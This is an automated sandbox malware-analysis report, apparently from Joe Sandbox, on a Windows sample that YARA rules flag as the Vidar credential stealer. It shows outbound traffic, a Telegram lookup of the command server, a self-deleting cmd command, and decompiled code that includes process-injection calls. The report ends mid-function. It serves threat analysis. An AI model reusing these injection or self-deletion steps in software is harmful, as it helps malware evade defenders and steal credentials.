Nov 30, 2022 00:10:07.800923109 CET	2853	OUT	Data Raw: 72 64 49 63 38 6c 2f 45 30 77 71 67 49 5a 54 52 4e 45 54 4a 4a 42 63 4b 48 48 4f 64 49 59 6c 49 51 2f 4b 49 63 56 71 34 4b 4f 53 63 63 6c 7a 2f 4c 36 67 4b 49 39 5a 4e 68 50 51 4b 77 49 53 49 6a 2f 33 63 34 51 64 51 6f 34 44 71 41 4d 58 68 61 77 Data Ascii: rdIc8l/E0wqgIZTRNETJJBcKHHOdIYlIQ/KIcVq4KOScclz/L6gKI9ZNhPQKwISIj/3c4QdQo4DqAMXhaw1965HthnmGvN9SUxQNJkTT2RezG37BNbErZ6C3sDPQ4cwZKKruYPAM9BhzBtppOQNxOW1VyB2ZRtkc+Kfsca28kDuc+dN0end+S+u+8b5a1hlIXmkL8Pisqnnf/L/SHfs1tUet2SlkzZw+Oi20asrkAlj5vK4pdhk
Nov 30, 2022 00:10:07.802326918 CET	2871	OUT	Data Raw: 41 67 2f 6f 44 50 38 73 34 65 76 42 77 42 4f 44 49 55 63 7a 4a 2b 44 58 37 54 44 67 53 55 71 4e 74 47 6d 55 7a 4e 67 33 55 42 4a 2f 43 79 54 53 65 6c 69 67 47 4f 6b 34 49 79 4d 5a 41 43 54 49 67 48 78 5a 4d 41 56 36 31 50 35 71 4b 43 78 78 65 63 Data Ascii: Ag/oDP8s4evBwBODIUczJ+DX7TDgSUqNtGmUzNg3UBJ/CyTSeligGOk4IyMZACTIgHxZMAV61P5qKCxxece039azwFLeCkq+rUkAf3mHkgK5rSpGmmW14WRvWDxijsNFOd14NnFjXwRYKthge947SykOudfYFqB34PU51fkXUPCISGgRoRph9mVQ0O9Dy+vl68aT4XT7VitdSuzFf5J0RN5UsG2tCFcb9Na+GzDeXomfjBIngGC
Nov 30, 2022 00:10:07.841804028 CET	2886	OUT	Data Raw: 79 32 33 48 2b 30 6c 6d 58 77 32 44 4b 32 70 74 75 73 7a 6b 36 78 79 39 48 48 42 66 33 62 51 6b 33 4a 73 53 46 58 41 44 73 69 2b 39 77 6d 31 38 42 47 57 79 45 5a 74 53 39 4f 35 30 41 6d 42 37 61 73 34 4a 44 56 6c 31 35 4d 66 70 72 50 31 59 7a 78 Data Ascii: y23H+0lmXw2DK2ptuszk6xy9HHBf3bQk3JsSFXADsi+9wm18BGWyEZtS9O50AmB7as4JDVl15MfprP1YzxhYoGC8X4IXLLRLQd5i1mlBLUkK+ttBJw7+JYobbjGGeMiSh4Rg2qnK/Tis8Fe+a/EhEB45JfAbLTHXWVioIZ30YepgueRAebJBNWHGRT+cMQUCgROvIKqGxjlAssYwEeQpx2s8aIsXVCE+snwsTYud9vRByz183eK
Nov 30, 2022 00:10:07.843837976 CET	2890	OUT	Data Raw: 4e 30 36 65 75 57 6c 70 41 48 6e 49 6c 79 62 64 67 76 63 32 32 39 6f 57 4a 6a 74 6f 4b 47 72 6f 75 4b 75 37 30 4f 47 78 30 4a 55 6f 30 2f 53 6d 77 76 56 69 73 62 63 65 55 62 65 44 33 67 6e 30 68 59 36 36 2b 52 50 77 65 56 75 53 54 41 65 46 6c 52 Data Ascii: N06euWlpAHnIlybdgvc229oWJjtoKGrouKu70OGx0JUo0/SmwvVisbceUbeD3gn0hY66+RPweVuSTAeFlRlCnJv5OL1OvWUVkfQk6VolCrUtSz+L0xnlXzgvlkMhvaPft2Q4xkQpff5M/RFyf2KQlsqQ/Sb3cYDjf/rfprP2ZLJJC+v+buuI9J+1J+QniTbPKboLUMOlF4g3O+V4pTTcLe+cxaZe7US+O2vKFPmUwi6nBnBQFG3
Nov 30, 2022 00:10:07.843897104 CET	2901	OUT	Data Raw: 38 6a 35 6e 34 2b 72 71 65 6d 48 4a 78 68 53 31 30 47 44 69 58 46 77 53 49 69 52 4d 41 35 33 65 4c 4b 4f 42 2b 74 39 37 30 6b 41 52 46 34 38 38 4e 61 7a 32 65 43 6f 78 4f 7a 55 37 42 2f 6b 38 6d 55 2f 48 62 73 56 64 6c 72 43 44 38 76 46 64 72 65 Data Ascii: 8j5n4+rqemHJxhS10GDiXFwSIiRMA53eLKOB+t970kARF488Naz2eCoxOzU7B/k8mU/HbsVdlrCD8vFdre112AbUtXgcDaRVrUIDMWYeecRR24nPp3EjlmRXSErSK8fLARJh9w4bOsJHj9+Hqo1MPoq+htSS7Ja4qR/vKXn6bDj02arGRVU1LtzoihSGo33i28erN76+UWQz1R9TWnJQs9W2+7KATJV82WAOqRSF4LF3wkSF64+
Nov 30, 2022 00:10:07.843925953 CET	2907	OUT	Data Raw: 57 35 5a 73 72 43 59 71 44 59 39 33 72 42 4a 46 44 34 4c 30 48 56 6a 41 5a 53 6a 64 7a 34 33 62 45 33 37 33 56 30 41 72 53 63 30 79 77 6f 6b 69 6d 63 62 37 6e 4f 74 66 43 46 63 4e 76 55 36 6c 6c 47 68 47 50 46 76 63 61 76 38 53 57 6d 70 38 68 49 Data Ascii: W5ZsrCYqDY93rBJFD4L0HVjAZSjdz43bE373V0ArSc0ywokimcb7nOtfCFcNvU6llGhGPFvcav8SWmp8hIL/um+RGygbB8ZGfWhsbRBg3Ug6eBZp/pWe2hZgQvd/8hRX+BfH5nxbRsmaLBf2Dsyc1qQf22CfwUf33yLrKCzjO5nIjS+ujXa+9/+1z64M2XH6B8J0ItKp6FmgHU+pL3Y7TljaWri7C1CQeTCA7hC69g3p+WLbOmY
Nov 30, 2022 00:10:07.847016096 CET	2919	OUT	Data Raw: 74 75 44 65 34 77 66 2f 43 6d 37 75 71 41 68 2b 4b 52 51 59 58 42 54 62 65 70 71 5a 64 54 62 4e 2f 78 58 57 2f 61 7a 38 73 52 42 45 54 46 38 37 78 77 6b 52 63 75 33 4b 30 70 4a 4a 55 68 4e 51 77 33 31 33 68 70 6f 4b 34 2f 58 2b 6c 64 62 54 57 48 Data Ascii: tuDe4wf/Cm7uqAh+KRQYXBTbepqZdTbN/xXW/az8sRBETF87xwkRcu3K0pJJUhNQw313hpoK4/X+ldbTWHM0Y8dZTcbUnclL8vEMxaNQ5WO74n8RySJkMV88LvHqV6Dju/UjDc5WG4+MDwi2c7J+er7APLMxdl7C1BGu8kn61MNt/INQ01NDVOCry7Wml4LqZ/7WIXv6rj8pSb+vaF4JZJjW0rz70Rkb2BvRH0O+RK+aKRQi356
Nov 30, 2022 00:10:07.882576942 CET	2927	OUT	Data Raw: 64 6a 4e 4f 58 77 46 66 6e 4e 2b 76 34 34 36 36 30 6a 51 36 6f 54 37 41 46 73 45 6c 4c 5a 4c 4b 2f 7a 2b 67 4a 63 48 69 76 4e 56 43 34 44 42 37 38 7a 39 6f 4e 4c 67 55 46 73 44 6f 4e 73 48 43 49 33 31 75 42 67 31 48 38 35 6d 38 48 49 41 52 4f 51 Data Ascii: djNOXwFfnN+v44660jQ6oT7AFsElLZLK/z+gJcHivNVC4DB78z9oNLgUFsDoNsHCI31uBg1H85m8HIAROQcxJyYCz6lBFcsIyBAxxU3M8AZ8ym255iA2Ru4LMz6AtMmaVkmCGlhHVjZrpfIxQCQ/KyoQ0RmuyAzF23EBnEZ0Qbp3cWmLBk8TtzZ/Eb93PIcBbze7v3ynD2SmPw2QXdTqMlsDFZrDS3cEuOHEAiET7zor18Zbv8J
Nov 30, 2022 00:10:07.882724047 CET	2937	OUT	Data Raw: 7a 44 37 75 52 38 4e 74 33 68 67 58 32 72 51 4b 41 50 52 70 36 73 77 79 44 7a 59 65 56 65 34 2f 42 77 71 63 51 51 34 35 37 64 39 49 6f 36 31 65 68 2f 30 78 39 56 74 6d 66 4b 6c 39 48 33 78 79 7a 2b 66 6c 44 52 37 5a 56 72 73 4a 61 63 7a 39 43 38 Data Ascii: zD7uR8Nt3hgX2rQKAPRp6swyDzYeVe4/BwqcQQ457d9Io61eh/0x9VtmfKl9H3xyz+flDR7ZVrsJacz9C8fVY5Nk3p/UIDyuzesbeeJPXtTDWYnjCLO20AB+HlpCeCjKbblP7//9j/yzeDhjIr5+b+N7kSoC+XCKXrcCYA1GR7Gen9F5r/Wfdu6sHotMkAwB4wopcxinNr2qQXfNKHUMoS9Z8T/P91pkSA2aBREWC6+tJgg+CjQ
Nov 30, 2022 00:10:08.244543076 CET	2946	IN	HTTP/1.1 200 OK Server: nginx Date: Tue, 29 Nov 2022 23:10:08 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a Data Ascii: 2ok0

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.2.7	49707	149.154.167.99	443	C:\Users\user\Desktop\file.exe

Timestamp	Direction	Data
2022-11-29 23:10:04 UTC	OUT	GET /asifrazatg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0;x64 rv:107.0) Gecko / 20100101 Firefox / 107.0 Host: t.me
2022-11-29 23:10:04 UTC	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Tue, 29 Nov 2022 23:10:04 GMT Content-Type: text/html; charset=utf-8 Content-Length: 12376 Connection: close Set-Cookie: stel_ssid=00560d96d59a6e89a8_11289673075084138544; expires=Wed, 30 Nov 2022 23:10:04 GMT; path=/; samesite=None; secure; HttpOnly Pragma: no-cache Cache-control: no-store X-Frame-Options: ALLOW-FROM https://web.telegram.org Content-Security-Policy: frame-ancestors https://web.telegram.org Strict-Transport-Security: max-age=35768000
2022-11-29 23:10:04 UTC	IN	Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 54 65 6c 65 67 72 61 6d 3a 20 43 6f 6e 74 61 63 74 20 40 61 73 69 66 72 61 7a 61 74 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 3e 74 72 79 7b 69 66 28 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 21 3d 6e 75 6c 6c 26 26 77 69 6e 64 6f 77 21 3d 77 69 6e 64 6f 77 2e 70 61 72 65 6e 74 29 7b 77 69 6e 64 6f 77 2e 70 61 Data Ascii: <!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @asifrazatg</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&window!=window.parent){window.pa

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: file.exePID: 5884, Parent PID: 3320

General

Target ID:	0
Start time:	00:10:02
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0xe80000
File size:	371200 bytes
MD5 hash:	5367709F0A96713B5C9A518E13F306D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.231893309.000000000079A000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: file.exePID: 5924, Parent PID: 5884

General

Target ID:	1
Start time:	00:10:03
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0xe80000
File size:	371200 bytes
MD5 hash:	5367709F0A96713B5C9A518E13F306D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000001.00000003.232045586.00000000004BC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: file.exePID: 5896, Parent PID: 5924

General

Target ID:	2
Start time:	00:10:03
Start date:	30/11/2022
Path:	C:\Users\user\Desktop\file.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\Desktop\file.exe
Imagebase:	0xe80000
File size:	371200 bytes
MD5 hash:	5367709F0A96713B5C9A518E13F306D6
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000002.00000002.244915415.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000002.00000002.245065608.00000000006E7000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: cmd.exePID: 5984, Parent PID: 5896

General

Target ID:	3
Start time:	00:10:09
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\cmd.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\user\Desktop\file.exe" & exit
Imagebase:	0xa60000
File size:	232960 bytes
MD5 hash:	F3BDBE3BB6F734E357235F4D5898582D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: conhost.exePID: 4656, Parent PID: 5984

General

Target ID:	4
Start time:	00:10:09
Start date:	30/11/2022
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff6edaf0000
File size:	625664 bytes
MD5 hash:	EA777DEEA782E8B4D7C7C33BBF8A4496
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: timeout.exePID: 3384, Parent PID: 5984

General

Target ID:	5
Start time:	00:10:09
Start date:	30/11/2022
Path:	C:\Windows\SysWOW64\timeout.exe
Wow64 process (32bit):	true
Commandline:	timeout /t 6
Imagebase:	0xdb0000
File size:	26112 bytes
MD5 hash:	121A4EDAE60A7AF6F5DFA82F7BB95659
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Disassembly

Reset < >

Analysis Process: file.exePID: 5884, Parent PID: 3320COMMON

Execution Graph

Execution Coverage:	11.4%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	6.9%
Total number of Nodes:	276
Total number of Limit Nodes:	5

Executed Functions

Function 00E82D4C Relevance: 3.5, APIs: 1, Strings: 1, Instructions: 3
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00E82D4C() {
				_Unknown_base(*)()* _t1;

				_t1 = SetUnhandledExceptionFilter(E00E82D58); // executed
				return _t1;
			}

0x00e82d51
0x00e82d57

APIs

SetUnhandledExceptionFilter.KERNELBASE(Function_00002D58,00E826C8), ref: 00E82D51

Strings

Pd)w, xrefs: 00E82D51

Memory Dump Source

Source File: 00000000.00000002.232011552.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.232007004.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232033759.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232044479.0000000000E86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232050805.0000000000E87000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232126967.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232132383.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_file.jbxd

Similarity

API ID: ExceptionFilterUnhandled
String ID: Pd)w
API String ID: 3192549508-800114742
Opcode ID: 7093b93d35d8ea516541a3c4cdb0b3bb5fc570f528e75ab0716ef72ca93a0322
Instruction ID: ae4287ca4a0e488e5f00ffce806a8c6a1cebdf0266896ac0e26fd7579d707dcd
Opcode Fuzzy Hash: 7093b93d35d8ea516541a3c4cdb0b3bb5fc570f528e75ab0716ef72ca93a0322
Instruction Fuzzy Hash:

Uniqueness

Uniqueness Score: -1.00%

Function 00E8235E Relevance: 6.0, APIs: 4, Instructions: 38
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 78%

			E00E8235E(signed int __edx, int _a4) {
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				void* _t54;
				intOrPtr _t70;
				signed int _t71;
				signed int _t72;
				signed int _t73;
				signed int _t76;
				signed int _t77;
				signed int _t83;
				intOrPtr _t86;
				intOrPtr _t87;
				intOrPtr* _t89;
				signed int _t90;
				intOrPtr* _t94;
				signed int _t100;
				signed int _t106;
				intOrPtr* _t109;
				signed int _t112;
				signed int _t115;
				signed int _t120;
				void* _t122;
				void* _t123;
				void* _t125;

				_t106 = __edx;
				while(1) {
					_t54 = malloc(_a4); // executed
					if(_t54 != 0) {
						return _t54;
					}
					_push(_a4);
					L00E82FCA();
					if(_t54 == 0) {
						if(_a4 != 0xffffffff) {
							_push(_t122);
							_t122 = _t125;
							_t125 = _t125 - 0xc;
							E00E82980( &_v20);
							_push(0xe8486c);
							_push( &_v20);
							L00E82FA6();
							asm("int3");
						}
						_push(_t122);
						_t123 = _t125;
						E00E81180( &_v20);
						_push(0xe848d0);
						_push( &_v20);
						L00E82FA6();
						asm("int3");
						_push(_t123);
						 *0xecf1e4 =  *0xecf1e4 & 0x00000000;
						 *0xe8600c =  *0xe8600c | 0x00000001;
						if(IsProcessorFeaturePresent(0xa) != 0) {
							_v28 = _v28 & 0x00000000;
							_push(_t86);
							_t109 =  &_v48;
							asm("cpuid");
							_t87 = _t86;
							 *_t109 = 0;
							 *((intOrPtr*)(_t109 + 4)) = _t86;
							 *((intOrPtr*)(_t109 + 8)) = 0;
							 *(_t109 + 0xc) = _t106;
							_v24 = _v48;
							_v16 = _v36 ^ 0x49656e69;
							_v20 = _v40 ^ 0x6c65746e;
							_push(_t87);
							asm("cpuid");
							_t89 =  &_v48;
							 *_t89 = 1;
							 *((intOrPtr*)(_t89 + 4)) = _t87;
							 *((intOrPtr*)(_t89 + 8)) = 0;
							 *(_t89 + 0xc) = _t106;
							if((_v16 | _v20 | _v44 ^ 0x756e6547) != 0) {
								L17:
								_t112 =  *0xecf1e8; // 0x2
							} else {
								_t83 = _v48 & 0x0fff3ff0;
								if(_t83 == 0x106c0 || _t83 == 0x20660 || _t83 == 0x20670 || _t83 == 0x30650 || _t83 == 0x30660 || _t83 == 0x30670) {
									_t115 =  *0xecf1e8; // 0x2
									_t112 = _t115 | 0x00000001;
									 *0xecf1e8 = _t112;
								} else {
									goto L17;
								}
							}
							_t100 = _v40;
							_t70 = 7;
							_v16 = _t100;
							if(_v24 < _t70) {
								_t90 = _v28;
							} else {
								_push(_t89);
								asm("cpuid");
								_t94 =  &_v48;
								 *_t94 = _t70;
								 *((intOrPtr*)(_t94 + 4)) = _t89;
								 *((intOrPtr*)(_t94 + 8)) = 0;
								_t100 = _v16;
								 *(_t94 + 0xc) = _t106;
								_t90 = _v44;
								if((_t90 & 0x00000200) != 0) {
									 *0xecf1e8 = _t112 | 0x00000002;
								}
							}
							_t71 =  *0xe8600c; // 0x6f
							_t72 = _t71 | 0x00000002;
							 *0xecf1e4 = 1;
							 *0xe8600c = _t72;
							if((_t100 & 0x00100000) != 0) {
								_t73 = _t72 | 0x00000004;
								 *0xecf1e4 = 2;
								 *0xe8600c = _t73;
								if((_t100 & 0x08000000) != 0 && (_t100 & 0x10000000) != 0) {
									asm("xgetbv");
									_v32 = _t73;
									_v28 = _t106;
									_t120 = 6;
									if((_v32 & _t120) == _t120) {
										_t76 =  *0xe8600c; // 0x6f
										_t77 = _t76 | 0x00000008;
										 *0xecf1e4 = 3;
										 *0xe8600c = _t77;
										if((_t90 & 0x00000020) != 0) {
											 *0xecf1e4 = 5;
											 *0xe8600c = _t77 | 0x00000020;
											if((_t90 & 0xd0030000) == 0xd0030000 && (_v32 & 0x000000e0) == 0xe0) {
												 *0xe8600c =  *0xe8600c | 0x00000040;
												 *0xecf1e4 = _t120;
											}
										}
									}
								}
							}
						}
						return 0;
					} else {
						continue;
					}
					break;
				}
			}

0x00e8235e
0x00e82370
0x00e82373
0x00e8237b
0x00e8237e
0x00e8237e
0x00e82363
0x00e82366
0x00e8236e
0x00e82383
0x00e82998
0x00e82999
0x00e8299b
0x00e829a1
0x00e829a6
0x00e829ae
0x00e829af
0x00e829b4
0x00e829b4
0x00e829b5
0x00e829b6
0x00e829be
0x00e829c3
0x00e829cb
0x00e829cc
0x00e829d1
0x00e829d2
0x00e829d5
0x00e829df
0x00e829f0
0x00e829f6
0x00e829fc
0x00e82a01
0x00e82a05
0x00e82a09
0x00e82a0b
0x00e82a0d
0x00e82a10
0x00e82a15
0x00e82a1e
0x00e82a2f
0x00e82a3a
0x00e82a40
0x00e82a41
0x00e82a47
0x00e82a4a
0x00e82a54
0x00e82a57
0x00e82a5a
0x00e82a5d
0x00e82aa2
0x00e82aa2
0x00e82a5f
0x00e82a62
0x00e82a6c
0x00e82a91
0x00e82a97
0x00e82a9a
0x00000000
0x00000000
0x00000000
0x00e82a6c
0x00e82aa8
0x00e82aad
0x00e82aae
0x00e82ab4
0x00e82ae6
0x00e82ab6
0x00e82ab8
0x00e82ab9
0x00e82abf
0x00e82ac2
0x00e82ac4
0x00e82ac7
0x00e82aca
0x00e82acd
0x00e82ad0
0x00e82ad9
0x00e82ade
0x00e82ade
0x00e82ad9
0x00e82ae9
0x00e82aee
0x00e82af1
0x00e82afb
0x00e82b06
0x00e82b0c
0x00e82b0f
0x00e82b19
0x00e82b24
0x00e82b30
0x00e82b33
0x00e82b36
0x00e82b41
0x00e82b46
0x00e82b48
0x00e82b4d
0x00e82b50
0x00e82b5a
0x00e82b62
0x00e82b67
0x00e82b71
0x00e82b7f
0x00e82b92
0x00e82b99
0x00e82b99
0x00e82b7f
0x00e82b62
0x00e82b46
0x00e82b24
0x00e82ba1
0x00e82ba5
0x00000000
0x00000000
0x00000000
0x00000000
0x00e8236e

APIs

_callnewh.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E81246,00000023,00E822E2,00E81E70,00E81E9E,?,?,?,?,?), ref: 00E82366
malloc.API-MS-WIN-CRT-HEAP-L1-1-0(?,?,00E81246,00000023,00E822E2,00E81E70,00E81E9E,?,?,?,?,?), ref: 00E82373
_CxxThrowException.VCRUNTIME140(?,00E8486C), ref: 00E829AF
_CxxThrowException.VCRUNTIME140(?,00E848D0), ref: 00E829CC

Memory Dump Source

Source File: 00000000.00000002.232011552.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.232007004.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232033759.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232044479.0000000000E86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232050805.0000000000E87000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232126967.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232132383.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_file.jbxd

Similarity

API ID: ExceptionThrow$_callnewhmalloc
String ID:
API String ID: 4113974480-0
Opcode ID: a87f84aea35e85ebb2af59b41adedc292404565f21640f5e9abe525f2df4e3f4
Instruction ID: c0410bd58ef8000f4d7b90e9b79034ebb7f2a4ab4b489d48d6830d4c403d7732
Opcode Fuzzy Hash: a87f84aea35e85ebb2af59b41adedc292404565f21640f5e9abe525f2df4e3f4
Instruction Fuzzy Hash: 52F09A3090030EB68F04BAA4EC1AA9C73BCAA00714F10626DFB2DB14D1EB70A655C390

Uniqueness

Uniqueness Score: -1.00%

Function 00E812F0 Relevance: 1.5, APIs: 1, Instructions: 16
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 64%

			E00E812F0() {
				void* _v16;
				void* _t5;
				intOrPtr _t7;

				asm("movups xmm0, [0xecf2b4]");
				asm("movups [esp], xmm0");
				E00E812D0();
				_t7 =  *0xecf334; // 0x7fb370
				_t5 = VirtualAllocEx(_v16,  *(_t7 + 0x34),  *(_t7 + 0x50), 0x3000, 0x40); // executed
				 *0xecf37c = _t5;
				return 0x205cb;
			}

0x00e812f3
0x00e812fa
0x00e812fe
0x00e81303
0x00e8131b
0x00e8131d
0x00e8132a

APIs

Part of subcall function 00E812D0: GetProcAddress.KERNEL32(00000000,VirtualAllocEx), ref: 00E812DB

VirtualAllocEx.KERNELBASE(?,?,?,00003000,00000040,?,agjv,?), ref: 00E8131B

Memory Dump Source

Source File: 00000000.00000002.232011552.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.232007004.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232033759.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232044479.0000000000E86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232050805.0000000000E87000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232126967.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232132383.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_file.jbxd

Similarity

API ID: AddressAllocProcVirtual
String ID:
API String ID: 2770133467-0
Opcode ID: 64890c816c108ea34968e42b4c9cca3593c4f0de4359635d1ce9a4a4587ef346
Instruction ID: 30d84ccaa11f979701b0a02a048a1c27346f4eff265d3f4492a6cb721391ab8f
Opcode Fuzzy Hash: 64890c816c108ea34968e42b4c9cca3593c4f0de4359635d1ce9a4a4587ef346
Instruction Fuzzy Hash: F8E0CD319017406FE305FF6DDD01F3537E1F758300F40156CE65865272D632915B8B40

Uniqueness

Uniqueness Score: -1.00%

Function 00E81370 Relevance: 1.5, APIs: 1, Instructions: 11
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E00E81370() {
				intOrPtr _t2;

				_t2 =  *0xecf2cc; // 0x700000
				ReadProcessMemory( *0xecf2b4,  *((intOrPtr*)(_t2 + 0xa4)) + 8, 0xecf380, 4, 0); // executed
				return 2;
			}

0x00e81370
0x00e8138e
0x00e81399

APIs

ReadProcessMemory.KERNELBASE(?,00ECF380,00000004,00000000,00E8162E,?,agjv,?,?,?,VirtualAlloc,00000000,00000000,00000000,?), ref: 00E8138E

Memory Dump Source

Source File: 00000000.00000002.232011552.0000000000E81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00E80000, based on PE: true

Associated: 00000000.00000002.232007004.0000000000E80000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232033759.0000000000E84000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232044479.0000000000E86000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232050805.0000000000E87000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232126967.0000000000ECE000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.232132383.0000000000ED0000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e80000_file.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 4ba8d61c61d3d3a950fca4c52b13539ea18aef9ae383ab2b88ef2a3ea6f93205
Instruction ID: 818f5f93fd4de73ed12207a5ca9ac3d3764e04ace12e88afbffd0ea97519400b
Opcode Fuzzy Hash: 4ba8d61c61d3d3a950fca4c52b13539ea18aef9ae383ab2b88ef2a3ea6f93205
Instruction Fuzzy Hash: F1D012B9380201AFE3104B09DD46F153255E744701F400071FB02FA1F1C17998058715

Uniqueness

Uniqueness Score: -1.00%

Function 00E82110 Relevance: 1.3, APIs: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 22%

			E00E82110(void* __ecx, void* __edx, void* __esi) {
				char _v12;
				intOrPtr _v16;
				intOrPtr _t6;
				signed int _t13;
				intOrPtr* _t15;
				intOrPtr _t17;
				intOrPtr* _t20;
				void* _t22;

				_t14 = __ecx;
				if(__ecx >= 0x1000) {
					_t3 = _t14 + 0x23; // 0x23
					_t6 = _t3;
					if(_t6 <= __ecx) {
						_t15 = _t22 - 0xc;
						E00E81180(_t15);
						_push(0xe848d0);
						_push( &_v12);
						L00E82FA6();
						asm("int3");
						asm("int3");
						asm("int3");
